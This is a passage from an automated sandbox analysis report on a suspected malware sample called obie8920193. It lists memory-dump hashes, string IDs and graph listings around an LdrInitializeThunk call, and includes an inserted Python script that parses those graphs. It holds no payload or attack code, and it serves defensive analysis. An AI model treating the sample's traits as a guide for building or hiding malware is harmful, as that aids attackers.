                      • Instruction ID: 72543b5870835b0820fb36b4c2fe8b74d50bb0709eb72f3117824000088e2165
                      • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                      • Instruction Fuzzy Hash: 76119D75904280DFDB16CF14E5C4B15FFA1FB84314F28C6ADD8494B656C33AD85ACBA2
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID: &k
                      • API String ID: 0-4254052200
                      • Opcode ID: 2cfd93cf6d706761e9d1295b2823961a4b8c96baacc9a36f7260f020bb61b70e
                      • Instruction ID: d7ebe0d80d3efd8ea1fa124beab822fb05f1e6528b898deec4861b5470ef551e
                      • Opcode Fuzzy Hash: 2cfd93cf6d706761e9d1295b2823961a4b8c96baacc9a36f7260f020bb61b70e
                      • Instruction Fuzzy Hash: 39E10C78E101598FCB14DFA9D580AADFBB2FF89304F258169D815AB356D730AD82CF60
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID: 8+k
                      • API String ID: 0-2032740483
                      • Opcode ID: f0ab5201659bce72ad43734ea7a9699673c958a894fc3bcfe08be6a29f156b11
                      • Instruction ID: 377694c87564085033e7c476c4dcc3fc6ad10c0ca4183df0c9e16c9652fd052d
                      • Opcode Fuzzy Hash: f0ab5201659bce72ad43734ea7a9699673c958a894fc3bcfe08be6a29f156b11
                      • Instruction Fuzzy Hash: 28E1FB74E102598FCB14DFA9D580AADFBF2BF89304F258169D814AB356D7319D82CF60
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID: )k
                      • API String ID: 0-3758044612
                      • Opcode ID: 543f4f22a73938df02b2598bbd97526dd38ddea4f0a8b6e8e9d1b9ff6d085091
                      • Instruction ID: e261e231a9b8f64f3b942b6407c440e03063dc6c51e35362e127668057c659af
                      • Opcode Fuzzy Hash: 543f4f22a73938df02b2598bbd97526dd38ddea4f0a8b6e8e9d1b9ff6d085091
                      • Instruction Fuzzy Hash: 77511C74E102598FDB14CFA9D5805AEFBF2BF89304F25816AD818A7256D7309941CFA0
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f4cadc1859dceffd3a37a09ce15a976d579568a1cf8538eb7607197bcbfd3b87
                      • Instruction ID: a19530c61071a60c92bd110ce97ffd88a05e677272b5176f12f461ccbf12ec76
                      • Opcode Fuzzy Hash: f4cadc1859dceffd3a37a09ce15a976d579568a1cf8538eb7607197bcbfd3b87
                      • Instruction Fuzzy Hash: 49E10C74E102598FCB54DFA9D580AAEFBB2FF89304F248169D814A7356D730AD81CFA0
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 32dc0c863fbe3a8c3175ab4d48fe412618d1efce8a73f86d918d9b3e5890029e
                      • Instruction ID: 126467bb4595cf2266b0c162dcdd7eebac78a442a7ab7cb816c49641d9cc3626
                      • Opcode Fuzzy Hash: 32dc0c863fbe3a8c3175ab4d48fe412618d1efce8a73f86d918d9b3e5890029e
                      • Instruction Fuzzy Hash: A1E10B74E101598FCB14DFA9D580AADFBB2FF89304F258169D815AB356D730AD82CFA0
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3a448483b93b483b1a6c68432b0ca049c1fc6fcea3b2e81632fd8b95a43c5955
                      • Instruction ID: 5e647d5d226a7f5f53a56d4d949688d75910b4e7eeea4881c50f74feee56bcfb
                      • Opcode Fuzzy Hash: 3a448483b93b483b1a6c68432b0ca049c1fc6fcea3b2e81632fd8b95a43c5955
                      • Instruction Fuzzy Hash: 21E10C74E102598FCB54DFA9D580AADFBB2FF89304F248169D814AB356D731AD82CF60
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ab35c43226fa658dac135a0f5b3a07e95cc0bac89d1730311ea5385cc3b9a7cf
                      • Instruction ID: f4985f30392a72be414af97310b839fa639ed9e26dda6976e86db741b2ecaec9
                      • Opcode Fuzzy Hash: ab35c43226fa658dac135a0f5b3a07e95cc0bac89d1730311ea5385cc3b9a7cf
                      • Instruction Fuzzy Hash: 3461F774E102198FCF14CFA9D5809AEFBF2BF89314F24816AD818AB316D7319941CF60
                      Memory Dump Source
                      • Source File: 00000005.00000002.365120465.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1c0000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a1a59aaa5b7bd0955ff8fbf4c53a3adfc74e94d765a0cbfcff6d158d287f9597
                      • Instruction ID: faf2c6d48b0e56deb77c2d37c5328d83713d81b55773a126496e7277f3232bbb
                      • Opcode Fuzzy Hash: a1a59aaa5b7bd0955ff8fbf4c53a3adfc74e94d765a0cbfcff6d158d287f9597
                      • Instruction Fuzzy Hash: 36E0923494A154DFCB14DF94E844BF8B7BCF76A311F1560AAD50EA3261DB309A89EF10

                      Execution Graph

                      Execution Coverage:13%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:28.6%
                      Total number of Nodes:14
                      Total number of Limit Nodes:0
                      execution_graph 11719 3c4720 11720 3c472c 11719->11720 11723 3c78c1 11720->11723 11721 3c47e0 11725 3c78f2 11723->11725 11724 3c7cd9 11724->11721 11725->11724 11728 3cfcb8 11725->11728 11732 3cfe53 11725->11732 11729 3cfcdf 11728->11729 11730 3cfe0a LdrInitializeThunk 11729->11730 11731 3cfdfb 11729->11731 11730->11731 11731->11725 11735 3cfd17 11732->11735 11733 3cfe0a LdrInitializeThunk 11734 3cfdfb 11733->11734 11734->11725 11735->11733 11735->11734

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2044 3cfcb8-3cfcdd 2045 3cfcdf 2044->2045 2046 3cfce4-3cfd4b 2044->2046 2045->2046 2051 3cfdd5-3cfddb 2046->2051 2052 3cfd50-3cfd63 2051->2052 2053 3cfde1-3cfdf9 2051->2053 2054 3cfd6a-3cfda6 2052->2054 2055 3cfd65 2052->2055 2056 3cfe0a-3cfe2a LdrInitializeThunk 2053->2056 2057 3cfdfb-3cfe08 2053->2057 2066 3cfda8-3cfdb6 2054->2066 2067 3cfdb9-3cfdcb 2054->2067 2055->2054 2058 3cfe2c-3cff07 2056->2058 2057->2058 2061 3cff0f-3cff18 2058->2061 2062 3cff09-3cff0e 2058->2062 2062->2061 2066->2053 2070 3cfdcd 2067->2070 2071 3cfdd2 2067->2071 2070->2071 2071->2051
                      APIs
                      • LdrInitializeThunk.NTDLL(000000FF), ref: 003CFE1A
                      Memory Dump Source
                      • Source File: 00000007.00000002.864098799.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_3c0000_obie8920193.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: fc725fac89748b705ca636c0ecadf8e47819bd69309a664caf847808857bffcd
                      • Instruction ID: 5d42983b044c137bdd348a1790af5efb2e82893f38104628b332a68d1129b415
                      • Opcode Fuzzy Hash: fc725fac89748b705ca636c0ecadf8e47819bd69309a664caf847808857bffcd
                      • Instruction Fuzzy Hash: EC5112B4D01218CFDB18CFAAD488BDDBBB2BF88314F20C52AE415AB294D7749845CF50
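The execution_graph and control_flow_graph lines above are the report's graph renderings flattened into token lists: "<node id> <address or address range> [API name]" declares a block and "<src>-><dst>" declares an edge. The following Python is an added worked example, not part of the Joe Sandbox report: it parses both listings (copied verbatim from this page), checks the parsed block count against the "Total number of Nodes:14" figure, finds the entry block, locates the block that covers the API reference at 003CFE1A, and walks the shortest path from the entry to the block annotated with LdrInitializeThunk. Node and edge semantics are taken from the listing itself; nothing else about the sandbox's internal format is assumed.

```python
"""Parse the flattened execution_graph / control_flow_graph listings that Joe
Sandbox prints (e.g. "execution_graph 11719 3c4720 11720 3c472c 11719->11720 ...")
and answer the questions a reviewer asks of them: how many basic blocks, which
block is the entry, and which path leads from the entry to the flagged API call."""
import re
from collections import deque
from dataclasses import dataclass, field

ADDR_RE = re.compile(r"[0-9a-f]+(?:-[0-9a-f]+)?")  # "3c4720" or "3cfcb8-3cfcdd"
LABEL_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")     # API name attached to a block

# Both listings are copied verbatim from the report (addresses in the 003C0000 region).
EXECUTION_GRAPH = """execution_graph 11719 3c4720 11720 3c472c 11719->11720 11723 3c78c1
11720->11723 11721 3c47e0 11725 3c78f2 11723->11725 11724 3c7cd9 11724->11721 11725->11724
11728 3cfcb8 11725->11728 11732 3cfe53 11725->11732 11729 3cfcdf 11728->11729 11730 3cfe0a
LdrInitializeThunk 11729->11730 11731 3cfdfb 11729->11731 11730->11731 11731->11725 11735
3cfd17 11732->11735 11733 3cfe0a LdrInitializeThunk 11734 3cfdfb 11733->11734 11734->11725
11735->11733 11735->11734"""

CONTROL_FLOW_GRAPH = """control_flow_graph 2044 3cfcb8-3cfcdd 2045 3cfcdf 2044->2045 2046
3cfce4-3cfd4b 2044->2046 2045->2046 2051 3cfdd5-3cfddb 2046->2051 2052 3cfd50-3cfd63
2051->2052 2053 3cfde1-3cfdf9 2051->2053 2054 3cfd6a-3cfda6 2052->2054 2055 3cfd65 2052->2055
2056 3cfe0a-3cfe2a LdrInitializeThunk 2053->2056 2057 3cfdfb-3cfe08 2053->2057 2066
3cfda8-3cfdb6 2054->2066 2067 3cfdb9-3cfdcb 2054->2067 2055->2054 2058 3cfe2c-3cff07
2056->2058 2057->2058 2061 3cff0f-3cff18 2058->2061 2062 3cff09-3cff0e 2058->2062 2062->2061
2066->2053 2070 3cfdcd 2067->2070 2071 3cfdd2 2067->2071 2070->2071 2071->2051"""


@dataclass
class Block:
    node_id: int
    start: int
    end: int                       # inclusive; equals start for single-address nodes
    apis: list = field(default_factory=list)


@dataclass
class Graph:
    name: str
    nodes: dict = field(default_factory=dict)   # node_id -> Block
    edges: list = field(default_factory=list)   # (src, dst) in listing order

    def successors(self, node_id):
        return [dst for src, dst in self.edges if src == node_id]

    def entry_nodes(self):
        """Blocks that nothing jumps to: the function's entry point(s)."""
        targets = {dst for _, dst in self.edges}
        return [n for n in self.nodes if n not in targets]


def parse_graph(text):
    tokens = text.split()
    graph = Graph(name=tokens[0])
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                          # edge: "11719->11720"
            src, dst = tok.split("->")
            graph.edges.append((int(src), int(dst)))
            i += 1
            continue
        if not (tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.fullmatch(tokens[i + 1])):
            raise ValueError(f"unexpected token {tok!r} at position {i}")
        lo, _, hi = tokens[i + 1].partition("-")  # node: "<id> <addr>" or "<id> <lo>-<hi>"
        block = Block(int(tok), int(lo, 16), int(hi or lo, 16))
        i += 2
        # Identifiers that follow a node are API names the sandbox attached to it.
        # A purely hex-looking word is treated as an address, never as a label.
        while i < len(tokens) and LABEL_RE.fullmatch(tokens[i]) and not ADDR_RE.fullmatch(tokens[i]):
            block.apis.append(tokens[i])
            i += 1
        graph.nodes[block.node_id] = block
    return graph


def block_containing(graph, address):
    """Block whose address range covers `address` (e.g. the report's API ref), or None."""
    return next((b for b in graph.nodes.values() if b.start <= address <= b.end), None)


def shortest_path_to_api(graph, api_name):
    """Breadth-first search from the entry block(s) to the first block annotated
    with `api_name`; returns the blocks on that path, or [] if it is unreachable."""
    parent, queue = {}, deque()
    for entry in graph.entry_nodes():
        parent[entry] = None
        queue.append(entry)
    while queue:
        cur = queue.popleft()
        if api_name in graph.nodes[cur].apis:
            path = []
            while cur is not None:
                path.append(graph.nodes[cur])
                cur = parent[cur]
            return path[::-1]
        for nxt in graph.successors(cur):
            if nxt not in parent:
                parent[nxt] = cur
                queue.append(nxt)
    return []


if __name__ == "__main__":
    for listing in (EXECUTION_GRAPH, CONTROL_FLOW_GRAPH):
        g = parse_graph(listing)
        print(f"{g.name}: {len(g.nodes)} nodes, {len(g.edges)} edges, entry {g.entry_nodes()}")
        path = shortest_path_to_api(g, "LdrInitializeThunk")
        print("  path to LdrInitializeThunk:", " -> ".join(f"{b.start:x}" for b in path))
    hit = block_containing(parse_graph(CONTROL_FLOW_GRAPH), 0x3CFE1A)
    print(f"  ref 003CFE1A lies in block {hit.node_id} ({hit.start:x}-{hit.end:x}) {hit.apis}")
```

For the execution graph the parser recovers exactly the 14 nodes the report counts, and the only entry block is 3c4720; the API-annotated blocks are reached through the 3cfcb8 branch in seven steps. For the control-flow graph the API reference at 003CFE1A falls inside node 2056 (3cfe0a-3cfe2a), the block the listing labels LdrInitializeThunk, and the entry-to-call path is 2044, 2046, 2051, 2053, 2056. The same parser works for the later control_flow_graph listings on this page, including the second 3cfe53 graph whose API block the report did not list under an APIs heading.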

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2109 575e58-575e78 2110 575e7f-575ef7 2109->2110 2111 575e7a 2109->2111 2115 575f44-575f96 2110->2115 2116 575ef9-575f3f 2110->2116 2111->2110 2123 575fdd-5760c1 2115->2123 2124 575f98-575fdc 2115->2124 2116->2123 2136 5760c7-5761c9 2123->2136 2137 576c76-576cab 2123->2137 2124->2123 2147 576c69-576c6f 2136->2147 2148 576c75 2147->2148 2149 5761ce-5762ab 2147->2149 2148->2137 2157 5762b2-57631a 2149->2157 2158 5762ad 2149->2158 2162 576321-576332 2157->2162 2163 57631c 2157->2163 2158->2157 2164 5763be-5764c4 2162->2164 2165 576338-576342 2162->2165 2163->2162 2183 5764c6 2164->2183 2184 5764cb-576533 2164->2184 2166 576344 2165->2166 2167 576349-5763bd 2165->2167 2166->2167 2167->2164 2183->2184 2188 576535 2184->2188 2189 57653a-57654b 2184->2189 2188->2189 2190 5765d7-57678a 2189->2190 2191 576551-57655b 2189->2191 2212 576791-57680e 2190->2212 2213 57678c 2190->2213 2192 576562-5765d6 2191->2192 2193 57655d 2191->2193 2192->2190 2193->2192 2217 576815-576826 2212->2217 2218 576810 2212->2218 2213->2212 2219 5768b2-57694b 2217->2219 2220 57682c-576836 2217->2220 2218->2217 2230 576952-5769c9 2219->2230 2231 57694d 2219->2231 2221 57683d-5768b1 2220->2221 2222 576838 2220->2222 2221->2219 2222->2221 2238 5769d0-5769e1 2230->2238 2239 5769cb 2230->2239 2231->2230 2240 5769e7-576a7b 2238->2240 2241 576ace-576b62 2238->2241 2239->2238 2255 576a82-576acd 2240->2255 2256 576a7d 2240->2256 2250 576c54-576c5f 2241->2250 2251 576b68-576c53 2241->2251 2253 576c66 2250->2253 2254 576c61 2250->2254 2251->2250 2253->2147 2254->2253 2255->2241 2256->2255
                      Memory Dump Source
                      • Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 60104d8c51657e5aa4e21069014426b1dc12487e66c87dc61ca1da35075dd0c8
                      • Instruction ID: d81415765d5eb89986bc0494fbde8b4ecbc4183078d9f6bbc2fcc264b7dec8c8
                      • Opcode Fuzzy Hash: 60104d8c51657e5aa4e21069014426b1dc12487e66c87dc61ca1da35075dd0c8
                      • Instruction Fuzzy Hash: B9827E74E012688FDB64DF69DC98BDDBBB2AF89300F1481EA950DA7265DB315E81CF40
                      Memory Dump Source
                      • Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fd2c181b8da4b83a856425a91e1f4a38323f09218190de012123acc4c58594c9
                      • Instruction ID: 20d727330a81ebf0a1e0abbddaf5f61ac32205adf155d2fe9e504ddcc4c50f94
                      • Opcode Fuzzy Hash: fd2c181b8da4b83a856425a91e1f4a38323f09218190de012123acc4c58594c9
                      • Instruction Fuzzy Hash: 14A19175E012288FEB68CF6AD944B9DBBF2BF89300F14C0AAD40DA7255DB345A85CF11
                      Memory Dump Source
                      • Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 69e0767cd01c735a675977020a00c31f29fd7c3f43ffb1954bd0624ac62889a1
                      • Instruction ID: d8d4657af73bf5e853ce3f28150b130e985c1bb9610223d4c29dcae7f5d4c8fb
                      • Opcode Fuzzy Hash: 69e0767cd01c735a675977020a00c31f29fd7c3f43ffb1954bd0624ac62889a1
                      • Instruction Fuzzy Hash: FBA18075E012288FEB68CF6AD944B9DBBF2BF89300F14C0AAD40DA7255DB345A85CF11
                      Memory Dump Source
                      • Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 61d051999cc6661a142bf1107e8ee5614ba447b21c81c3ed9387e9263d8baf95
                      • Instruction ID: 2ddccfdc35dcb40cff991f353d4ee27543346886514e4d6a9aec98cf8af7805a
                      • Opcode Fuzzy Hash: 61d051999cc6661a142bf1107e8ee5614ba447b21c81c3ed9387e9263d8baf95
                      • Instruction Fuzzy Hash: F8A19F75E012288FEB68CF6AD945B9DBBF2BB89300F14C0EAD40DA7255DB745A85CF10
                      Memory Dump Source
                      • Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 71aca36ca3c9ab1762d38424a1fe21a3febe361c50e0a53e0e5183dd785ed673
                      • Instruction ID: e084f5ca026c042bbbd19c2e3df0f85ecb2ae3b229fe97c2a5e719804f088829
                      • Opcode Fuzzy Hash: 71aca36ca3c9ab1762d38424a1fe21a3febe361c50e0a53e0e5183dd785ed673
                      • Instruction Fuzzy Hash: C0A18374E012288FEB68CF6AD944B9DBBF2BF89300F14C0AAD40DA7255DB345A85CF51
                      Memory Dump Source
                      • Source File: 00000007.00000002.864470478.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_690000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bba09446fbd579408acffd9a92ffca3cec0f9bb096fc88cbc9d81f4203dd05fa
                      • Instruction ID: b0f0e38c2344f1819fb8bc3c469f62f28a74a28b63a929c30d149eaff746840b
                      • Opcode Fuzzy Hash: bba09446fbd579408acffd9a92ffca3cec0f9bb096fc88cbc9d81f4203dd05fa
                      • Instruction Fuzzy Hash: 6FA19274E01228CFEB68CF6AD944B9DBBF6AF89300F14C1AAD40DA7255DB345A85CF11
                      Memory Dump Source
                      • Source File: 00000007.00000002.864470478.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_690000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 26bfaaf6814ef7e04e9b4f96932328c399835da5278abe7726898d77555414a0
                      • Instruction ID: e1a16897b14f22a50849568bd1741bc02d12661ba5478e405022c060a9ce8f22
                      • Opcode Fuzzy Hash: 26bfaaf6814ef7e04e9b4f96932328c399835da5278abe7726898d77555414a0
                      • Instruction Fuzzy Hash: B3A19374E012288FEB68CF6AD944BDDBBF6AF89300F14C0AAD50DA7255DB345A85CF11
                      Memory Dump Source
                      • Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 11199036ba2eb85b313357dc577b6e732ae6410f9f2742939def0df8893a3bb3
                      • Instruction ID: ba13d5ab2a5cde04621d7df226bcc169faa6e500b7d7b576ac9089c1822b27ec
                      • Opcode Fuzzy Hash: 11199036ba2eb85b313357dc577b6e732ae6410f9f2742939def0df8893a3bb3
                      • Instruction Fuzzy Hash: 1CA17074E012288FEB68CF6AD945B9DBBF2BB89300F14C4AAD40DA7255DB345A85CF11
                      Memory Dump Source
                      • Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: efc051eb8cb112d0cc42c776d153f3f0e68b709c642159f7b171858973ad206f
                      • Instruction ID: 21df63909ec7113202826d7782fe0f11a0e020f7b582c0060e5bff2471c9a927
                      • Opcode Fuzzy Hash: efc051eb8cb112d0cc42c776d153f3f0e68b709c642159f7b171858973ad206f
                      • Instruction Fuzzy Hash: 2BA18175E012288FEB68CF6AD944B9DBBF2BF89300F14C0AAD40DA7255DB345A85CF51
                      Memory Dump Source
                      • Source File: 00000007.00000002.864470478.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_690000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 112b66137c519f1ed77983d0d93d21809f5b76c698893c2519e2265c8718897e
                      • Instruction ID: 51c3bd93b03984c68db497c00c3a9f92a64dbea8eac7d3896abecaf92e0d2812
                      • Opcode Fuzzy Hash: 112b66137c519f1ed77983d0d93d21809f5b76c698893c2519e2265c8718897e
                      • Instruction Fuzzy Hash: 8EA19174E01228CFEB68CF6AD944BDDBBF2AF89300F14C0AAD409A7255DB345A85CF50
                      Memory Dump Source
                      • Source File: 00000007.00000002.864470478.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_690000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e0c5fe8e0eca9d1dce1a01f602de49c53a97d28f9c90b263f440f86f53e659e0
                      • Instruction ID: f40f92ba85b7204dc1d4bfab1e84cf2c03e1e1be75f0ebea9907991f755f4700
                      • Opcode Fuzzy Hash: e0c5fe8e0eca9d1dce1a01f602de49c53a97d28f9c90b263f440f86f53e659e0
                      • Instruction Fuzzy Hash: FF51A571E056588FEB59CF6AD9557D9BBF3AFC9200F04C0AAC44CAA265DB340A86CF11

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2072 3cfe53-3cfe5d 2073 3cfe5f-3cfe67 2072->2073 2074 3cfe69-3cfe6c 2072->2074 2075 3cfe6f-3cfe75 2073->2075 2074->2075 2076 3cfe7e-3cfe7f 2075->2076 2077 3cfe77 2075->2077 2079 3cfeee-3cfefb 2076->2079 2077->2076 2078 3cfe32-3cfe44 2077->2078 2080 3cfe4d-3cfe4e 2078->2080 2081 3cfe46 2078->2081 2101 3cff03-3cff07 2079->2101 2080->2079 2081->2076 2081->2078 2081->2080 2082 3cfdb8 2081->2082 2083 3cfdba-3cfdcb 2081->2083 2084 3cfdfb-3cfe08 2081->2084 2085 3cfdb5-3cfdb6 2081->2085 2086 3cfd17-3cfd1d 2081->2086 2087 3cfd50-3cfd63 2081->2087 2088 3cfd32-3cfd4b 2081->2088 2089 3cfe2c-3cfe2d 2081->2089 2090 3cfda8-3cfdb2 2081->2090 2091 3cfe0a-3cfe2a LdrInitializeThunk 2081->2091 2092 3cfd24-3cfd2b 2081->2092 2093 3cfde1-3cfdf9 2081->2093 2098 3cfdb9 2082->2098 2099 3cfdcd 2083->2099 2100 3cfdd2 2083->2100 2084->2089 2085->2093 2086->2092 2096 3cfd6a-3cfda6 2087->2096 2097 3cfd65 2087->2097 2095 3cfdd5-3cfddb 2088->2095 2089->2101 2090->2085 2091->2089 2092->2088 2093->2084 2093->2091 2095->2087 2095->2093 2096->2090 2096->2098 2097->2096 2098->2083 2099->2100 2100->2095 2103 3cff0f-3cff18 2101->2103 2104 3cff09-3cff0e 2101->2104 2104->2103
                      Memory Dump Source
                      • Source File: 00000007.00000002.864098799.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_3c0000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e007139dc278ae8036ac28f0ba761be8ce25846e1de8e99f9e61985af786c437
                      • Instruction ID: f8ed795f5d2e18ab8d0152601e8c6506a5f2a996caad4b4aee1c822707efb4cc
                      • Opcode Fuzzy Hash: e007139dc278ae8036ac28f0ba761be8ce25846e1de8e99f9e61985af786c437
                      • Instruction Fuzzy Hash: F151EFB4D01208CFCB15CFA9D488BECBBB6FF49325F209529E016AB295D7749885CF14
                      Memory Dump Source
                      • Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d7f2e68136ac94458403e59e35ba9fff324d83bd9f01289871189e1dc7db4bb8
                      • Instruction ID: a60718c817df8897f07800e8c0c2c9f78170629bee41a9baac648a777384919f
                      • Opcode Fuzzy Hash: d7f2e68136ac94458403e59e35ba9fff324d83bd9f01289871189e1dc7db4bb8
                      • Instruction Fuzzy Hash: B141A174E01218CFDB54DFA9E598BEDBBF2BF49300F20912AD809A7294DB345A46CF54
                      Memory Dump Source
                      • Source File: 00000007.00000002.864004992.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1fd000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 36beff617af57bd7014613533ce210f433b6f5de1f90a58dcafabc589b295174
                      • Instruction ID: 0d1e960966b2971c89c3cd62f1c01534a9b3f5efb8c3aee987772c787a67ade1
                      • Opcode Fuzzy Hash: 36beff617af57bd7014613533ce210f433b6f5de1f90a58dcafabc589b295174
                      • Instruction Fuzzy Hash: 0721F2B1604248AFDB15CF24E8C4B36BB66EB84314F34C5A9E9494B246CB36D847CB61
                      Memory Dump Source
                      • Source File: 00000007.00000002.864004992.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1fd000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                      • Instruction ID: 3e3f7a4bf50355bf73bcfffc23bd96d5bf4b0209aacd46b2b5d84e4bb4fe8715
                      • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                      • Instruction Fuzzy Hash: 9311D075504244CFDB12CF10D9C4B25BF62FB44314F24C6ADE9494B256C33AD84ACF61
